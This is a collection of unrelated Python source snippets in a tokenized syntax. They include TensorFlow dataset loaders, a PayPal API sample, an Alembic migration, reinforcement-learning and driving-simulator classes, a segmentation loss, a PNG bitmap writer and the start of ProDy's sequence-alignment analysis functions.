batch_size: The batch size to use for the training dataset.
batch_size_test: The batch size to use for the test dataset.
num_classes: the number of supervised classes in the dataset.
shape: the shape of an input data array.
"""<line_sep>DATAKEY:Optional[str]=<none><line_sep>LABELKEY:str='label'<def_stmt>__init__ self name batch_size batch_size_test shuffle_buffer_size prefetch_size=1 seed=<none><block_start>"""Base class for datasets.
Args:
name: The TFDS name of the dataset.
batch_size: The batch size to use for the training dataset.
batch_size_test: The batch size to use for the test dataset.
shuffle_buffer_size: The buffer size to use for dataset shuffling.
prefetch_size: The number of mini-batches to prefetch.
seed: The random seed used to shuffle.
Returns:
A Dataset object.
"""<line_sep>super().__init__()<line_sep>self.name=name<line_sep>self.batch_size=batch_size<line_sep>self.batch_size_test=batch_size_test<line_sep>self._shuffle_buffer_size=shuffle_buffer_size<line_sep>self._prefetch_size=prefetch_size<line_sep>self._train_ds,self._train_info=tfds.load(self.name split=tfds.Split.TRAIN data_dir=self._dataset_dir() with_info=<true>)<line_sep>self._train_ds=self._train_ds.shuffle(self._shuffle_buffer_size seed).map(self.preprocess).cache().map(self.augment).batch(self.batch_size drop_remainder=<true>).prefetch(self._prefetch_size)<line_sep>self._test_ds,self._test_info=tfds.load(self.name split=tfds.Split.TEST data_dir=self._dataset_dir() with_info=<true>)<line_sep>self._test_ds=self._test_ds.map(self.preprocess).cache().batch(self.batch_size_test).prefetch(self._prefetch_size)<line_sep>self.num_classes=self._train_info.features['label'].num_classes<line_sep>self.shape=self._train_info.features['image'].shape<block_end><def_stmt>_dataset_dir self<block_start>"""Returns the dataset path for the TFDS data."""<line_sep><return><none><block_end><def_stmt>get_train self<block_start>"""Returns the training dataset."""<line_sep><return>iter(tfds.as_numpy(self._train_ds))<block_end><def_stmt>get_train_len self<block_start>"""Returns the length of the training dataset."""<line_sep><return>self._train_info.splits['train'].num_examples<block_end><def_stmt>get_test self<block_start>"""Returns the test dataset."""<line_sep><return>iter(tfds.as_numpy(self._test_ds))<block_end><def_stmt>get_test_len self<block_start>"""Returns the length of the test dataset."""<line_sep><return>self._test_info.splits['test'].num_examples<block_end><def_stmt>preprocess self data<block_start>"""Preprocessing fn used by TFDS map for normalization.
This function is for transformations that can be cached, e.g.
normalization/whitening.
Args:
data: Data sample.
Returns:
Data after being normalized/transformed.
"""<line_sep><return>data<block_end><def_stmt>augment self data<block_start>"""Preprocessing fn used by TFDS map for augmentation at training time.
This function is for transformations that should not be cached, e.g. random
augmentation that should change for every sample, and are only applied at
training time.
Args:
data: Data sample.
Returns:
Data after being augmented/transformed.
"""<line_sep><return>data<block_end><block_end><class_stmt>ImageDataset(Dataset)<block_start>"""Base class for image datasets."""<line_sep>DATAKEY='image'<def_stmt>preprocess self data<block_start>"""Preprocessing function used by TFDS map for normalization.
This function is for transformations that can be cached, e.g.
normalization/whitening.
Args:
data: Data sample.
Returns:
Data after being normalized/transformed.
"""<line_sep>data=super().preprocess(data)<line_sep># Ensure we only provide the image and label, stripping out other keys.
<return>dict((key val)<for>key,val data.items()<if>key<in>[self.LABELKEY self.DATAKEY])<block_end><block_end>
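As the preprocess/augment docstrings explain, cacheable normalization belongs in preprocess while per-sample randomness belongs in augment. A hedged sketch of a concrete subclass following that split (the TFDS name and transforms are illustrative, not part of the original module; tf refers to the module-level tensorflow.compat.v2 import):
class Cifar10Dataset(ImageDataset):
    """Illustrative subclass: normalize in preprocess (cached), flip in augment (not cached)."""

    def __init__(self, batch_size, batch_size_test, shuffle_buffer_size=10000, seed=None):
        super().__init__('cifar10', batch_size, batch_size_test,
                         shuffle_buffer_size, seed=seed)

    def preprocess(self, data):
        data = super().preprocess(data)  # keeps only the image/label keys
        image = tf.cast(data[self.DATAKEY], tf.float32) / 255.0
        return {self.DATAKEY: image, self.LABELKEY: data[self.LABELKEY]}

    def augment(self, data):
        data = super().augment(data)
        image = tf.image.random_flip_left_right(data[self.DATAKEY])
        return {self.DATAKEY: image, self.LABELKEY: data[self.LABELKEY]}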
|
# GetPaymentList Sample
# This sample code demonstrates how you can
# retrieve a list of all Payment resources
# you've created using the Payments API.
# Note various query parameters that you can
# use to filter, and paginate through the
# payments list.
# API used: GET /v1/payments/payments
<import_from_stmt>paypalrestsdk Payment<import_stmt>logging<line_sep>logging.basicConfig(level=logging.INFO)<line_sep># Retrieve
# Retrieve the PaymentHistory by calling the
# `all` method
# on the Payment class
# Refer to the API documentation
# for valid values for keys
# Supported parameters are :count, :next_id
payment_history=Payment.all({"count":2})<line_sep># List Payments
print("List Payment:")<for_stmt>payment payment_history.payments<block_start>print(" -> Payment[%s]"%(payment.id))<block_end>
|
"""empty message
Revision ID: <KEY>
Revises: 36954739c63
Create Date: 2015-11-23 21:16:54.103342
"""<line_sep># revision identifiers, used by Alembic.
revision='<KEY>'<line_sep>down_revision='3<PASSWORD>4<PASSWORD>'<import_from_stmt>alembic op<import_stmt>sqlalchemy<as>sa<def_stmt>upgrade ### commands auto generated by Alembic - please adjust! ###
<block_start><with_stmt>op.batch_alter_table('user')<as>batch_op<block_start>batch_op.alter_column('created' existing_type=sa.DATETIME() nullable=<false>)<line_sep>batch_op.alter_column('updated' existing_type=sa.DATETIME() nullable=<false>)<block_end>### end Alembic commands ###
<block_end><def_stmt>downgrade ### commands auto generated by Alembic - please adjust! ###
<block_start><with_stmt>op.batch_alter_table('user')<as>batch_op<block_start>batch_op.alter_column('updated' existing_type=sa.DATETIME() nullable=<true>)<line_sep>batch_op.alter_column('created' existing_type=sa.DATETIME() nullable=<true>)<block_end>### end Alembic commands ###
<block_end>
|
<import_from_stmt>..datasets NLVR2Dataset<import_from_stmt>.datamodule_base BaseDataModule<class_stmt>NLVR2DataModule(BaseDataModule)<block_start><def_stmt>__init__ self *args **kwargs<block_start>super().__init__(*args **kwargs)<block_end>@property<def_stmt>dataset_cls self<block_start><return>NLVR2Dataset<block_end>@property<def_stmt>dataset_name self<block_start><return>"nlvr2"<block_end><block_end>
|
"""Base class of HalfCheetah meta-environments."""<import_from_stmt>gym.envs.mujoco HalfCheetahEnv<as>HalfCheetahEnv_<import_stmt>numpy<as>np<import_from_stmt>garage EnvSpec<class_stmt>HalfCheetahEnvMetaBase(HalfCheetahEnv_)<block_start>"""Base class of HalfCheetah meta-environments.
Code is adapted from
https://github.com/tristandeleu/pytorch-maml-rl/blob/493e677e724aa67a531250b0e215c8dbc9a7364a/maml_rl/envs/mujoco/half_cheetah.py
Which was in turn adapted from
https://github.com/cbfinn/maml_rl/blob/9c8e2ebd741cb0c7b8bf2d040c4caeeb8e06cc95/rllab/envs/mujoco/half_cheetah_env_rand.py
Args:
task (dict): Subclass specific task information.
"""<def_stmt>__init__ self task<block_start>self._task=task<line_sep>super().__init__()<line_sep>self.spec=EnvSpec(action_space=self.action_space observation_space=self.observation_space)<block_end><def_stmt>_get_obs self<block_start>"""Get a low-dimensional observation of the state.
Returns:
np.ndarray: Contains the flattened angle quaternion, angular
velocity quaternion, and cartesian position.
"""<line_sep><return>np.concatenate([self.sim.data.qpos.flat[1:] self.sim.data.qvel.flat self.get_body_com('torso').flat ]).astype(np.float32).flatten()<block_end><def_stmt>viewer_setup self<block_start>"""Start the viewer."""<line_sep>camera_id=self.model.camera_name2id('track')<line_sep>self.viewer.cam.type=2<line_sep>self.viewer.cam.fixedcamid=camera_id<line_sep>self.viewer.cam.distance=self.model.stat.extent<times>0.35<line_sep># Hide the overlay
# This code was inherited, so we'll ignore this access violation for
# now.
# pylint: disable=protected-access
self.viewer._hide_overlay=<true><block_end><def_stmt>__getstate__ self<block_start>"""See `Object.__getstate__.
Returns:
dict: The instance’s dictionary to be pickled.
"""<line_sep><return>dict(task=self._task)<block_end><def_stmt>__setstate__ self state<block_start>"""See `Object.__setstate__.
Args:
state (dict): Unpickled state of this object.
"""<line_sep>self.__init__(task=state['task'])<block_end><block_end>
|
<import_from_stmt>metadrive.component.road_network.base_road_network BaseRoadNetwork LaneIndex<import_stmt>gc<import_stmt>copy<import_stmt>logging<import_from_stmt>typing List Tuple Dict<import_stmt>numpy<as>np<import_from_stmt>metadrive.component.lane.abs_lane AbstractLane<import_from_stmt>metadrive.component.road_network.road Road<import_from_stmt>metadrive.component.road_network.base_road_network BaseRoadNetwork<import_from_stmt>metadrive.constants Decoration<import_from_stmt>metadrive.utils.math_utils get_boxes_bounding_box<import_from_stmt>metadrive.utils.scene_utils get_lanes_bounding_box<import_from_stmt>collections namedtuple<line_sep>lane_info=namedtuple("neighbor_lanes" "lane entry_lanes exit_lanes left_lanes right_lanes")<class_stmt>EdgeRoadNetwork(BaseRoadNetwork)<block_start>"""
Compared to NodeRoadNetwork, which represents the relations between lanes in a node-based graph, EdgeRoadNetwork
stores the relationships in an edge-based graph, which is more common in real map representations
"""<def_stmt>__init__ self<block_start>super(EdgeRoadNetwork self).__init__()<line_sep>self.graph={}<block_end><def_stmt>add_lane self lane<arrow><none><block_start>self.graph[lane.index]=lane_info(lane=lane entry_lanes=lane.entry_lanes exit_lanes=lane.exit_lanes left_lanes=lane.left_lanes right_lanes=lane.right_lanes)<block_end><def_stmt>get_lane self index:LaneIndex<block_start><return>self.graph[index].lane<block_end><def_stmt>__isub__ self other<block_start><for_stmt>id,lane_info other.graph.items()<block_start>self.graph.pop(id)<block_end><return>self<block_end><def_stmt>add self other no_intersect=<true><block_start><for_stmt>id,lane_info other.graph.items()<block_start><if_stmt>no_intersect<block_start><assert_stmt>id<not><in>self.graph.keys() "Intersect: {} exists in two network".format(id)<block_end>self.graph[id]=other.graph[id]<block_end><return>self<block_end><def_stmt>_get_bounding_box self<block_start>"""
By using this bounding box, the edge lengths in the x and y directions and the center of this road network can be
easily calculated.
:return: minimum x value, maximum x value, minimum y value, maximum y value
"""<line_sep>lanes=[]<for_stmt>id,lane_info, self.graph.items()<block_start>lanes.append(lane_info.lane)<block_end>res_x_max,res_x_min,res_y_max,res_y_min=get_boxes_bounding_box([get_lanes_bounding_box(lanes)])<line_sep><return>res_x_min res_x_max res_y_min res_y_max<block_end><def_stmt>shortest_path self start:str goal:str<block_start><return>next(self.bfs_paths(start goal) [])<block_end><def_stmt>bfs_paths self start:str goal:str<arrow>List[List[str]]<block_start>"""
Breadth-first search of all routes from start to goal.
:param start: starting node
:param goal: goal node
:return: list of paths from start to goal.
"""<line_sep>queue=[(start [start])]<while_stmt>queue<block_start>(node path)=queue.pop(0)<if_stmt>node<not><in>self.graph<block_start><yield>[]<block_end><for_stmt>_next set(self.graph[node].exit_lanes)-set(path)<block_start><if_stmt>_next<eq>goal<block_start><yield>path+[_next]<block_end><elif_stmt>_next<in>self.graph<block_start>queue.append((_next path+[_next]))<block_end><block_end><block_end><block_end><def_stmt>get_peer_lanes_from_index self lane_index<block_start>info:lane_info=self.graph[lane_index]<line_sep>ret=[self.graph[lane_index].lane]<for_stmt>left_n info.left_lanes<block_start>ret.append(self.graph[left_n["id"]].lane)<block_end><for_stmt>right_n info.right_lanes<block_start>ret.append(self.graph[right_n["id"]].lane)<block_end><return>ret<block_end><def_stmt>destroy self<block_start>super(EdgeRoadNetwork self).destroy()<for_stmt>k,v self.graph.items()<block_start>v.lane.destroy()<line_sep>self.graph[k]:lane_info=<none><block_end>self.graph=<none><block_end><def_stmt>__del__ self<block_start>logging.debug("{} is released".format(self.__class__.__name__))<block_end><block_end>
|
<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>....datasets.utils DataProcessing<def_stmt>filter_valid_label scores labels num_classes ignored_label_inds device<block_start>"""Loss functions for semantic segmentation."""<line_sep>valid_scores=scores.reshape(-1 num_classes)<line_sep>valid_labels=labels.reshape(-1).to(device)<line_sep>ignored_bool=torch.zeros_like(valid_labels dtype=torch.bool)<for_stmt>ign_label ignored_label_inds<block_start>ignored_bool=torch.logical_or(ignored_bool torch.eq(valid_labels ign_label))<block_end>valid_idx=torch.where(torch.logical_not(ignored_bool))[0].to(device)<line_sep>valid_scores=torch.gather(valid_scores 0 valid_idx.unsqueeze(-1).expand(-1 num_classes))<line_sep>valid_labels=torch.gather(valid_labels 0 valid_idx)<line_sep># Reduce label values in the range of logit shape
reducing_list=torch.arange(0 num_classes dtype=torch.int64)<line_sep>inserted_value=torch.zeros([1] dtype=torch.int64)<for_stmt>ign_label ignored_label_inds<block_start><if_stmt>ign_label<ge>0<block_start>reducing_list=torch.cat([reducing_list[:ign_label] inserted_value reducing_list[ign_label:]] 0)<block_end><block_end>valid_labels=torch.gather(reducing_list.to(device) 0 valid_labels.long())<line_sep><return>valid_scores valid_labels<block_end><class_stmt>SemSegLoss(object)<block_start>"""Loss functions for semantic segmentation."""<def_stmt>__init__ self pipeline model dataset device<block_start>super(SemSegLoss self).__init__()<line_sep># weighted_CrossEntropyLoss
<if_stmt>'class_weights'<in>dataset.cfg.keys()<and>len(dataset.cfg.class_weights)<ne>0<block_start>class_wt=DataProcessing.get_class_weights(dataset.cfg.class_weights)<line_sep>weights=torch.tensor(class_wt dtype=torch.float device=device)<line_sep>self.weighted_CrossEntropyLoss=nn.CrossEntropyLoss(weight=weights)<block_end><else_stmt><block_start>self.weighted_CrossEntropyLoss=nn.CrossEntropyLoss()<block_end><block_end><block_end>
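A small worked example of the label remapping step in filter_valid_label: with three valid classes and raw label 0 ignored, reducing_list becomes [0, 0, 1, 2], so the remaining raw labels 1, 2, 3 map onto logit indices 0, 1, 2 (CPU tensors, illustrative values):
import torch

num_classes = 3
reducing_list = torch.arange(0, num_classes, dtype=torch.int64)   # tensor([0, 1, 2])
inserted_value = torch.zeros([1], dtype=torch.int64)
for ign_label in [0]:                                             # raw label 0 is ignored
    reducing_list = torch.cat(
        [reducing_list[:ign_label], inserted_value, reducing_list[ign_label:]], 0)
print(reducing_list)                                              # tensor([0, 0, 1, 2])
raw_labels = torch.tensor([2, 3, 1])
print(torch.gather(reducing_list, 0, raw_labels))                 # tensor([1, 2, 0])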
|
""". regress totemp gnpdefl gnp unemp armed pop year
Source | SS df MS Number of obs = 16
-------------+------------------------------ F( 6, 9) = 330.29
Model | 184172402 6 30695400.3 Prob > F = 0.0000
Residual | 836424.129 9 92936.0144 R-squared = 0.9955
-------------+------------------------------ Adj R-squared = 0.9925
Total | 185008826 15 12333921.7 Root MSE = 304.85
------------------------------------------------------------------------------
totemp | Coef. Std. Err. t P>|t| [95% Conf. Interval]
-------------+----------------------------------------------------------------
gnpdefl | 15.06167 84.91486 0.18 0.863 -177.0291 207.1524
gnp | -.0358191 .033491 -1.07 0.313 -.111581 .0399428
unemp | -2.020229 .4883995 -4.14 0.003 -3.125065 -.9153928
armed | -1.033227 .2142741 -4.82 0.001 -1.517948 -.5485049
pop | -.0511045 .2260731 -0.23 0.826 -.5625173 .4603083
year | 1829.151 455.4785 4.02 0.003 798.7873 2859.515
_cons | -3482258 890420.3 -3.91 0.004 -5496529 -1467987
------------------------------------------------------------------------------
"""<line_sep>#From Stata using Longley dataset as in the test and example for GLM
"""
. glm totemp gnpdefl gnp unemp armed pop year
Iteration 0: log likelihood = -109.61744
Generalized linear models No. of obs = 16
Optimization : ML Residual df = 9
Scale parameter = 92936.01
Deviance = 836424.1293 (1/df) Deviance = 92936.01
Pearson = 836424.1293 (1/df) Pearson = 92936.01
Variance function: V(u) = 1 [Gaussian]
Link function : g(u) = u [Identity]
AIC = 14.57718
Log likelihood = -109.6174355 BIC = 836399.2
------------------------------------------------------------------------------
| OIM
totemp | Coef. Std. Err. z P>|z| [95% Conf. Interval]
-------------+----------------------------------------------------------------
gnpdefl | 15.06167 84.91486 0.18 0.859 -151.3684 181.4917
gnp | -.0358191 .033491 -1.07 0.285 -.1014603 .029822
unemp | -2.020229 .4883995 -4.14 0.000 -2.977475 -1.062984
armed | -1.033227 .2142741 -4.82 0.000 -1.453196 -.6132571
pop | -.0511045 .2260731 -0.23 0.821 -.4941996 .3919906
year | 1829.151 455.4785 4.02 0.000 936.4298 2721.873
_cons | -3482258 890420.3 -3.91 0.000 -5227450 -1737066
------------------------------------------------------------------------------
"""<line_sep>#RLM Example
"""
. rreg stackloss airflow watertemp acidconc
Huber iteration 1: maximum difference in weights = .48402478
Huber iteration 2: maximum difference in weights = .07083248
Huber iteration 3: maximum difference in weights = .03630349
Biweight iteration 4: maximum difference in weights = .2114744
Biweight iteration 5: maximum difference in weights = .04709559
Biweight iteration 6: maximum difference in weights = .01648123
Biweight iteration 7: maximum difference in weights = .01050023
Biweight iteration 8: maximum difference in weights = .0027233
Robust regression Number of obs = 21
F( 3, 17) = 74.15
Prob > F = 0.0000
------------------------------------------------------------------------------
stackloss | Coef. Std. Err. t P>|t| [95% Conf. Interval]
-------------+----------------------------------------------------------------
airflow | .8526511 .1223835 6.97 0.000 .5944446 1.110858
watertemp | .8733594 .3339811 2.61 0.018 .1687209 1.577998
acidconc | -.1224349 .1418364 -0.86 0.400 -.4216836 .1768139
_cons | -41.6703 10.79559 -3.86 0.001 -64.447 -18.89361
------------------------------------------------------------------------------
"""<line_sep>
|
var=5<line_sep>a="my string {}".format(var)<line_sep>
|
<import_stmt>png<import_from_stmt>depixel.io_data PixelDataWriter<class_stmt>Bitmap(object)<block_start>mode='RGB'<line_sep>bgcolour=(127 127 127)<def_stmt>__init__ self size bgcolour=<none> mode=<none><block_start><if_stmt>bgcolour<is><not><none><block_start>self.bgcolour=bgcolour<block_end><if_stmt>mode<is><not><none><block_start>self.mode=mode<block_end>self.size=size<line_sep>self.pixels=[]<for_stmt>_ range(self.size[1])<block_start>self.pixels.append([bgcolour]<times>self.size[0])<block_end><block_end><def_stmt>set_pixel self x y value<block_start>self.pixels[y][x]=value<block_end><def_stmt>pixel self x y<block_start><return>self.pixels[y][x]<block_end><def_stmt>set_data self data<block_start><assert_stmt>len(data)<eq>self.size[1]<line_sep>new_pixels=[]<for_stmt>row data<block_start><assert_stmt>len(row)<eq>self.size[0]<line_sep>new_pixels.append(row[:])<block_end>self.pixels=new_pixels<block_end><def_stmt>set_block self x y data<block_start><assert_stmt>0<le>x<le>(self.size[0]-len(data[0]))<assert_stmt>0<le>y<le>(self.size[1]-len(data))<for_stmt>dy,row enumerate(data)<block_start><for_stmt>dx,value enumerate(row)<block_start>self.set_pixel(x+dx y+dy value)<block_end><block_end><block_end><def_stmt>flat_pixels self<block_start>flat_pixels=[]<for_stmt>row self.pixels<block_start>frow=[]<for_stmt>value row<block_start>frow.extend(value)<block_end>flat_pixels.append(frow)<block_end><return>flat_pixels<block_end><def_stmt>write_png self filename<block_start>png.from_array(self.flat_pixels() mode=self.mode).save(filename)<block_end><def_stmt>draw_line self p0 p1 colour<block_start>"""Bresenham's line algorithm."""<line_sep>x0,y0=p0<line_sep>x1,y1=p1<line_sep>dx=abs(x0-x1)<line_sep>dy=abs(y0-y1)<line_sep>sx=1<if>x0<l>x1<else>-1<line_sep>sy=1<if>y0<l>y1<else>-1<line_sep>err=dx-dy<while_stmt>(x0 y0)<ne>(x1 y1)<block_start>self.set_pixel(x0 y0 colour)<line_sep>e2=2<times>err<if_stmt>e2<g>-dy<block_start>err<augsub>dy<line_sep>x0<augadd>+sx<block_end><if_stmt>e2<l>dx<block_start>err<augadd>dx<line_sep>y0<augadd>sy<block_end><block_end>self.set_pixel(x1 y1 colour)<block_end><def_stmt>fill self point colour<block_start>old_colour=self.pixels[point[1]][point[0]]<if_stmt>old_colour<eq>colour<block_start><return><block_end>self.fill_scan(point old_colour colour)<block_end><def_stmt>fill_pix self point old_colour colour<block_start>"""
Pixel flood-fill. Reliable, but slow.
"""<line_sep>to_fill=[point]<while_stmt>to_fill<block_start>x,y=to_fill.pop()<line_sep>self.set_pixel(x y colour)<for_stmt>nx,ny [(x-1 y) (x+1 y) (x y-1) (x y+1)]<block_start><if_stmt>0<le>nx<l>self.size[0]<and>0<le>ny<l>self.size[1]<block_start><if_stmt>self.pixels[ny][nx]<eq>old_colour<block_start>to_fill.append((nx ny))<block_end><block_end><block_end><block_end><block_end><def_stmt>fill_scan self point old_colour colour<block_start>"""
Scanline flood-fill. Faster than the pixel fill: it fills vertical runs of the old colour and seeds new fills in the neighbouring columns.
"""<line_sep>to_fill=[point]<while_stmt>to_fill<block_start>x,y=to_fill.pop()<while_stmt>y<g>0<and>self.pixel(x y-1)<eq>old_colour<block_start>y<augsub>1<block_end>lspan=<false><line_sep>rspan=<false><while_stmt>y<l>self.size[1]<and>self.pixel(x y)<eq>old_colour<block_start>self.set_pixel(x y colour)<if_stmt><not>lspan<and>x<g>0<and>self.pixel(x-1 y)<eq>old_colour<block_start>to_fill.append((x-1 y))<line_sep>lspan=<true><block_end><elif_stmt>lspan<and>x<g>0<and>self.pixel(x-1 y)<eq>old_colour<block_start>lspan=<false><block_end><if_stmt>(<not>rspan<and>x<l>self.size[0]-1<and>self.pixel(x+1 y)<eq>old_colour)<block_start>to_fill.append((x+1 y))<line_sep>rspan=<true><block_end><elif_stmt>(rspan<and>x<l>self.size[0]-1<and>self.pixel(x+1 y)<eq>old_colour)<block_start>rspan=<false><block_end>y<augadd>1<block_end><block_end><block_end><block_end><class_stmt>PixelDataPngWriter(PixelDataWriter)<block_start>FILE_EXT='png'<def_stmt>translate_pixel self pixel<block_start><if_stmt><not>isinstance(pixel (list tuple))# Assume monochrome values normalised to [0, 1].
<block_start><return>(int(255<times>pixel) )<times>3<block_end><return>pixel<block_end><def_stmt>make_drawing self drawing_type _filename<block_start><if_stmt>drawing_type<eq>'pixels'<block_start><return>Bitmap(self.pixel_data.size)<block_end><return>Bitmap((self.pixel_data.size_x<times>self.PIXEL_SCALE+1 self.pixel_data.size_y<times>self.PIXEL_SCALE+1) bgcolour=(127 127 127))<block_end><def_stmt>save_drawing self drawing filename<block_start>drawing.write_png(filename)<block_end><def_stmt>draw_pixel self drawing pt colour<block_start>drawing.set_pixel(pt[0] pt[1] self.translate_pixel(colour))<block_end><def_stmt>draw_line self drawing pt0 pt1 colour<block_start>drawing.draw_line(pt0 pt1 self.translate_pixel(colour))<block_end><def_stmt>draw_polygon self drawing path colour fill<block_start>pt0=path[-1]<for_stmt>pt1 path<block_start>self.draw_line(drawing pt0 pt1 colour)<line_sep>pt0=pt1<block_end>middle=(sum([p[0]<for>p path])/len(path) sum([p[1]<for>p path])/len(path))<line_sep>drawing.fill(middle fill)<block_end><def_stmt>draw_path_shape self drawing paths colour fill<block_start><for_stmt>path paths<block_start>pt0=path[-1]<for_stmt>pt1 path<block_start>self.draw_line(drawing pt0 pt1 colour)<line_sep>pt0=pt1<block_end><block_end>drawing.fill(self.find_point_within(paths fill) fill)<block_end><def_stmt>find_point_within self paths colour<block_start><for_stmt>node,attrs self.pixel_data.pixel_graph.nodes_iter(data=<true>)<block_start><if_stmt>colour<eq>attrs['value']<block_start>pt=self.scale_pt(node (0.5 0.5))<if_stmt>self.is_inside(pt paths)<block_start><return>pt<block_end><block_end><block_end><block_end><def_stmt>is_inside self pt paths<block_start><if_stmt><not>self._is_inside(pt paths[0])# Must be inside the "outside" path.
<block_start><return><false><block_end><for_stmt>path paths[1:]<block_start><if_stmt>self._is_inside(pt path)# Must be outside the "inside" paths.
<block_start><return><false><block_end><block_end><return><true><block_end><def_stmt>_is_inside self pt path<block_start>inside=<false><line_sep>x,y=pt<line_sep>x0,y0=path[-1]<for_stmt>x1,y1 path<block_start><if_stmt>(y0<le>y<l>y1<or>y1<le>y<l>y0)<and>(x0<le>x<or>x1<le>x)# This crosses our ray.
<block_start><if_stmt>(x1+float(y-y1)/(y0-y1)<times>(x0-x1))<l>x<block_start>inside=<not>inside<block_end><block_end>x0,y0=x1 y1<block_end><return>inside<block_end><def_stmt>draw_shapes self drawing element=<none><block_start><for_stmt>shape self.pixel_data.shapes<block_start>paths=[[self.scale_pt(p)<for>p path]<for>path shape['paths']]<line_sep>self.draw_path_shape(drawing paths self.GRID_COLOUR shape['value'])<block_end><block_end><block_end><def_stmt>read_png filename<block_start>_w,_h,pixels,_meta=png.Reader(filename=filename).asRGB8()<line_sep>data=[]<for_stmt>row pixels<block_start>d_row=[]<while_stmt>row<block_start>d_row.append((row.pop(0) row.pop(0) row.pop(0)))<block_end>data.append(d_row)<block_end><return>data<block_end>
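A hedged usage sketch of the Bitmap above: draw a diagonal with the Bresenham routine, flood-fill the region above it, and write the result to disk (size, colours and filename are arbitrary):
bmp = Bitmap((16, 16), bgcolour=(255, 255, 255))
bmp.draw_line((0, 0), (15, 15), (0, 0, 0))   # black diagonal via Bresenham
bmp.fill((15, 0), (200, 60, 60))             # scanline fill of the upper-right triangle
bmp.write_png('demo.png')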
|
# -*- coding: utf-8 -*-
"""This module defines MSA analysis functions."""<line_sep>__author__='<NAME>, <NAME>, <NAME>'<import_from_stmt>numbers Integral<import_stmt>os<import_from_stmt>numpy dtype zeros empty ones where ceil shape eye<import_from_stmt>numpy indices tril_indices array ndarray isscalar unique<import_from_stmt>prody LOGGER<import_from_stmt>prody.utilities which MATCH_SCORE MISMATCH_SCORE<import_from_stmt>prody.utilities GAP_PENALTY GAP_EXT_PENALTY ALIGNMENT_METHOD<import_from_stmt>prody.sequence.msa MSA refineMSA<import_from_stmt>prody.sequence.msafile parseMSA writeMSA<import_from_stmt>prody.sequence.sequence Sequence<import_from_stmt>prody.atomic Atomic<import_from_stmt>prody.measure calcDistance<import_from_stmt>Bio pairwise2<import_stmt>sys<line_sep>__all__=['calcShannonEntropy' 'buildMutinfoMatrix' 'calcMSAOccupancy' 'applyMutinfoCorr' 'applyMutinfoNorm' 'calcRankorder' 'filterRankedPairs' 'buildSeqidMatrix' 'uniqueSequences' 'buildOMESMatrix' 'buildSCAMatrix' 'buildDirectInfoMatrix' 'calcMeff' 'buildPCMatrix' 'buildMSA' 'showAlignment' 'alignTwoSequencesWithBiopython' 'alignSequenceToMSA' 'calcPercentIdentities' 'alignSequencesByChain' 'trimAtomsUsingMSA']<line_sep>doc_turbo="""
By default, *turbo* mode, which uses memory as large as the MSA array
itself but runs four to five times faster, will be used. If memory
allocation fails, the implementation will fall back to slower and
memory efficient mode."""<def_stmt>calcPercentIdentities msa<block_start>percent_ids=[]<line_sep>aas=['A' 'C' 'D' 'E' 'F' 'G' 'H' 'I' 'J' 'K' 'L' 'M' 'N' 'P' 'Q' 'R' 'S' 'T' 'V' 'W' 'Y' '-']<for_stmt>i range(len(msa))<block_start>col_list=list(msa.getArray()[: i])<line_sep>max_count=0<for_stmt>aa aas<block_start><if_stmt>col_list.count(aa)<g>max_count<block_start>max_count=col_list.count(aa)<block_end><block_end>percent_ids.append(float(max_count)/float(len(col_list))<times>100)<block_end><return>percent_ids<block_end><def_stmt>getMSA msa<block_start>"""Returns MSA character array."""<try_stmt><block_start>msa=msa._getArray()<block_end><except_stmt>AttributeError<block_start><pass><block_end><try_stmt><block_start>dtype_,ndim,shape=msa.dtype msa.ndim msa.shape<block_end><except_stmt>AttributeError<block_start><raise>TypeError('msa must be an MSA instance or a 2D character array')<block_end><if_stmt>dtype_<ne>dtype('|S1')<or>ndim<ne>2<block_start><raise>TypeError('msa must be an MSA instance or a 2D character array')<block_end><return>msa<block_end><def_stmt>calcShannonEntropy msa ambiguity=<true> omitgaps=<true> **kwargs<block_start>"""Returns Shannon entropy array calculated for *msa*, which may be
an :class:`.MSA` instance or a 2D Numpy character array. Implementation
is case insensitive and handles ambiguous amino acids as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters are considered as distinct types.
All non-alphabet characters are considered as gaps, and they are handled
in two ways:
* non-existent, the probability of observing amino acids in a given
column is adjusted, by default
* as a distinct character with its own probability, when *omitgaps* is
**False**"""<line_sep>msa=getMSA(msa)<line_sep>length=msa.shape[1]<line_sep>entropy=empty(length float)<import_from_stmt>.msatools msaentropy<line_sep><return>msaentropy(msa entropy ambiguity=bool(ambiguity) omitgaps=bool(omitgaps))<block_end><def_stmt>buildMutinfoMatrix msa ambiguity=<true> turbo=<true> **kwargs<block_start>"""Returns mutual information matrix calculated for *msa*, which may be an
:class:`.MSA` instance or a 2D Numpy character array. Implementation
is case insensitive and handles ambiguous amino acids as follows:
* **B** (Asx) count is allocated to *D* (Asp) and *N* (Asn)
* **Z** (Glx) count is allocated to *E* (Glu) and *Q* (Gln)
* **J** (Xle) count is allocated to *I* (Ile) and *L* (Leu)
* **X** (Xaa) count is allocated to the twenty standard amino acids
* Joint probability of observing a pair of ambiguous amino acids is
allocated to all potential combinations, e.g. probability of **XX**
is allocated to 400 combinations of standard amino acids, similarly
probability of **XB** is allocated to 40 combinations of *D* and *N*
with the standard amino acids.
Selenocysteine (**U**, Sec) and pyrrolysine (**O**, Pyl) are considered
as distinct amino acids. When *ambiguity* is set **False**, all alphabet
characters are considered as distinct types. All non-alphabet characters
are considered as gaps.
Mutual information matrix can be normalized or corrected using
:func:`applyMINormalization` and :func:`applyMICorrection` methods,
respectively. Normalization by joint entropy can performed using this
function with *norm* option set **True**."""<line_sep>msa=getMSA(msa)<import_from_stmt>.msatools msamutinfo<line_sep>LOGGER.timeit('_mutinfo')<line_sep>length=msa.shape[1]<line_sep>mutinfo=empty((length length) float)<line_sep>mutinfo=msamutinfo(msa mutinfo ambiguity=bool(ambiguity) turbo=bool(turbo) norm=bool(kwargs.get('norm' <false>)) debug=bool(kwargs.get('debug' <false>)))<line_sep>LOGGER.report('Mutual information matrix was calculated in %.2fs.' '_mutinfo')<line_sep><return>mutinfo<block_end>buildMutinfoMatrix.__doc__<augadd>doc_turbo<def_stmt>calcMSAOccupancy msa occ='res' count=<false><block_start>"""Returns occupancy array calculated for residue positions (default,
